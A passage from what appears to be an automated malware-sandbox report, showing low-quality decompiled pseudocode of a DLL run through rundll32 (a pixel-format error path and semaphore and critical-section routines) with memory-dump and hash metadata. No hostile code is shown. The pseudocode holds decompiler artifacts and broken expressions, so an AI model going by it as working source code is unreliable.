                                                      				} else {
                                                      					L33:
                                                      					__ebx = __ebx[4];
                                                      					__eax = L10031930(__ecx);
                                                      					 *__esp = __esi;
                                                      					__esp[4] = __ebx;
                                                      					__ebx = 0xffffffd8;
                                                      					__esp[3] = __eax;
                                                      					__eax = "The hardware pixel format \'%s\' is not supported by the device type \'%s\'\n";
                                                      					__esp[2] = "The hardware pixel format \'%s\' is not supported by the device type \'%s\'\n";
                                                      					__eax = 0x10;
                                                      					__esp[1] = 0x10;
                                                      					__eax = L10023A40();
                                                      					L2:
                                                      					return 0;
                                                      				}
                                                      				L1:
                                                      				goto L2;
                                                      			}




                                                      APIs
                                                      Strings
                                                      • The hardware pixel format '%s' is not supported by the device type '%s', xrefs: 1001E663
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_callocmv_frame_allocmv_frame_freemv_freepmv_get_pix_fmt_namemv_image_check_sizemv_log
                                                      • String ID: The hardware pixel format '%s' is not supported by the device type '%s'
                                                      • API String ID: 473889652-379977042
                                                      • Opcode ID: f3e8bdb9d7c170bdc459c1ee668fdc6473492807cb8fec2a19448897106cc44b
                                                      • Instruction ID: 2c6a83db8df34ec64cc29cb3759a8fadaa61080bb751505f1c4c7e836789d21e
                                                      • Opcode Fuzzy Hash: f3e8bdb9d7c170bdc459c1ee668fdc6473492807cb8fec2a19448897106cc44b
                                                      • Instruction Fuzzy Hash: A2F022786047418FC710DF29C08051EBBE0EB4D760F558A5DEAE99B391D774EC809B92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      • The hardware pixel format '%s' is not supported by the device type '%s', xrefs: 1001E663
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_get_pix_fmt_namemv_log
                                                      • String ID: The hardware pixel format '%s' is not supported by the device type '%s'
                                                      • API String ID: 3418758923-379977042
                                                      • Opcode ID: 29ee3040ede78108e4cc3fd02deb21ab80279a55efe4e481cb1b1b588cc07577
                                                      • Instruction ID: 525b23ace38b9bb6834e06c5e8b4b181dd8ba8557f5f50a91c42102dc809ce23
                                                      • Opcode Fuzzy Hash: 29ee3040ede78108e4cc3fd02deb21ab80279a55efe4e481cb1b1b588cc07577
                                                      • Instruction Fuzzy Hash: 36E02DB89187409FC710DF29808121EBBE0FB49710F51CD2EA9E89B341D774E8809B82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 21%
                                                      			E100A32F0(void* __edi, void* __ebp, signed int* _a4) {
                                                      				intOrPtr _v16;
                                                      				intOrPtr _v32;
                                                      				char _v40;
                                                      				char _v44;
                                                      				intOrPtr _v52;
                                                      				intOrPtr _v56;
                                                      				signed int* __ebx;
                                                      				struct _CRITICAL_SECTION* __esi;
                                                      				signed int* _t32;
                                                      				int _t42;
                                                      				struct _CRITICAL_SECTION* _t45;
                                                      				intOrPtr _t52;
                                                      				signed int _t53;
                                                      				signed int _t54;
                                                      				intOrPtr _t56;
                                                      				void* _t57;
                                                      				void* _t70;
                                                      				intOrPtr _t71;
                                                      				void* _t75;
                                                      				void* _t76;
                                                      				intOrPtr* _t78;
                                                      				intOrPtr* _t79;
                                                      
                                                      				_t70 = __ebp;
                                                      				_t57 = __edi;
                                                      				_push(_t45);
                                                      				_t76 = _t75 - 0x24;
                                                      				_t32 = _a4;
                                                      				if(_t32 == 0) {
                                                      					L17:
                                                      					return 0x16;
                                                      				} else {
                                                      					__ebx =  *__eax;
                                                      					if(__ebx == 0) {
                                                      						goto L17;
                                                      					} else {
                                                      						if(__ebx == 0xffffffff) {
                                                      							L21:
                                                      							__esp = __esp + 0x24;
                                                      							__eax = 0;
                                                      							_pop(__ebx);
                                                      							_pop(__esi);
                                                      							return 0;
                                                      						} else {
                                                      							__eax = 0x16;
                                                      							if( *__ebx == 0xc0bab1fd) {
                                                      								_t12 = __ebx + 0x14; // 0x14
                                                      								__esi = _t12;
                                                      								EnterCriticalSection(__esi);
                                                      								__eax =  *((intOrPtr*)(__ebx + 0xc));
                                                      								__esp = __esp - 4;
                                                      								if(__eax != 0) {
                                                      									__ecx =  *((intOrPtr*)(__ebx + 8));
                                                      									__eax = __eax + 1;
                                                      									__edx = __ecx - 1;
                                                      									if(__ecx == 0) {
                                                      										goto L20;
                                                      									} else {
                                                      										goto L19;
                                                      									}
                                                      								} else {
                                                      									__eax =  *((intOrPtr*)(__ebx + 0x10));
                                                      									if( *((intOrPtr*)(__ebx + 8)) <=  *((intOrPtr*)(__ebx + 0x10))) {
                                                      										L20:
                                                      										LeaveCriticalSection(__esi);
                                                      										__esp = __esp - 4;
                                                      										goto L21;
                                                      									} else {
                                                      										_t16 = __ebx + 0x60; // 0x60
                                                      										__edx = _t16;
                                                      										__eax =  *((intOrPtr*)(__ebx + 0x68));
                                                      										__ecx = 0xffffffff;
                                                      										_v40 = _t16;
                                                      										_t19 = __ebx + 0x48; // 0x48
                                                      										__edx = _t19;
                                                      										_v44 = _t19;
                                                      										__edx = 1;
                                                      										__eax = E100A30A0( *((intOrPtr*)(__ebx + 0x68)), 0xffffffff, 1);
                                                      										if(__eax != 0) {
                                                      											_v16 = __eax;
                                                      											LeaveCriticalSection(__esi);
                                                      											__esp = __esp - 4;
                                                      											__eax = _v16;
                                                      											goto L10;
                                                      										} else {
                                                      											__eax =  *((intOrPtr*)(__ebx + 0x10));
                                                      											__edx =  *((intOrPtr*)(__ebx + 8));
                                                      											if(__eax != 0) {
                                                      												 *((intOrPtr*)(__ebx + 0x10)) = 0;
                                                      												__edx = __edx - __eax;
                                                      											}
                                                      											__edx = __edx - 1;
                                                      											__eax = 1;
                                                      											L19:
                                                      											 *((intOrPtr*)(__ebx + 8)) = __edx;
                                                      											 *((intOrPtr*)(__ebx + 0xc)) = __eax;
                                                      											LeaveCriticalSection(__esi);
                                                      											__eax =  *((intOrPtr*)(__ebx + 0x64));
                                                      											_t28 = __ebx + 0x2c; // 0x2c
                                                      											__ecx = _t28;
                                                      											__ebx = __ebx + 0x44;
                                                      											__esp = __esp - 4;
                                                      											__edx = 1;
                                                      											_a4 = __ebx;
                                                      											__esp = __esp + 0x24;
                                                      											_pop(__ebx);
                                                      											_pop(__esi);
                                                      											_push(_t70);
                                                      											_t71 = _t52;
                                                      											_push(_t57);
                                                      											_push(_t64);
                                                      											_t78 = _t76 - 0x2c;
                                                      											_v32 = _t32;
                                                      											 *_t78 = _t52;
                                                      											EnterCriticalSection(_t45);
                                                      											_t79 = _t78 - 4;
                                                      											_t53 =  *_a4;
                                                      											asm("cdq");
                                                      											asm("adc edx, edi");
                                                      											_v44 = 1;
                                                      											_v40 = _t56;
                                                      											asm("sbb eax, edi");
                                                      											if(0x7fffffff < 1 + _t53) {
                                                      												 *_t79 = _t71;
                                                      												LeaveCriticalSection(??);
                                                      												return 0x22;
                                                      											} else {
                                                      												asm("lock add [eax], ebx");
                                                      												if(_t53 >= 0) {
                                                      													L4:
                                                      													 *_t79 = _t71;
                                                      													LeaveCriticalSection(??);
                                                      													return 0;
                                                      												} else {
                                                      													_t54 =  ~_t53;
                                                      													_v52 = 0;
                                                      													_t55 =  >  ? 1 : _t54;
                                                      													 *_t79 = _v32;
                                                      													_v56 =  >  ? 1 : _t54;
                                                      													_t42 = ReleaseSemaphore(??, ??, ??);
                                                      													_t79 = _t79 - 0xc;
                                                      													if(_t42 == 0) {
                                                      														asm("lock add [eax], ebx");
                                                      														 *_t79 = _t71;
                                                      														LeaveCriticalSection(??);
                                                      														return 0x16;
                                                      													} else {
                                                      														goto L4;
                                                      													}
                                                      												}
                                                      											}
                                                      										}
                                                      									}
                                                      								}
                                                      							} else {
                                                      								L10:
                                                      								__esp = __esp + 0x24;
                                                      								_pop(__ebx);
                                                      								_pop(__esi);
                                                      								return __eax;
                                                      							}
                                                      						}
                                                      					}
                                                      				}
                                                      			}


























                                                      APIs
                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?,100A251B), ref: 100A3336
                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,00000000,?,100A251B), ref: 100A33C6
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave
                                                      • String ID:
                                                      • API String ID: 3168844106-0
                                                      • Opcode ID: 4e649fb5589839585a3db9129e011a102968486331968e4d623d8a606afbd6b6
                                                      • Instruction ID: cd97afb910d891c998fc8f4c8da6addb25bd49834f2ec99f6cb4ecbf8d1de135
                                                      • Opcode Fuzzy Hash: 4e649fb5589839585a3db9129e011a102968486331968e4d623d8a606afbd6b6
                                                      • Instruction Fuzzy Hash: 0D317CB2A08200CFDB44EF68D9C465ABBE0FF44354F048269FC058F249EB75DA85CB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,00000014,-0000001C,00000018,100A3371), ref: 100A30C0
                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,00000000,00000014,-0000001C,00000018,100A3371), ref: 100A30DC
                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000014,-0000001C,00000018,100A3371), ref: 100A3119
                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000014,-0000001C,00000018,100A3371), ref: 100A3125
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave
                                                      • String ID:
                                                      • API String ID: 3168844106-0
                                                      • Opcode ID: f1c14836da530fe9eca5c2f1fe85ea188205922fc14795e91c327708d0793e06
                                                      • Instruction ID: 8d8f9149d6a0c4a1080b13f3e35a8b2e82ad2259457e814be12ca506ec95b23d
                                                      • Opcode Fuzzy Hash: f1c14836da530fe9eca5c2f1fe85ea188205922fc14795e91c327708d0793e06
                                                      • Instruction Fuzzy Hash: 171103B5A093219FC300EF79E98550EBBF0EF89661F02492DE98887311D231E848CB93
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%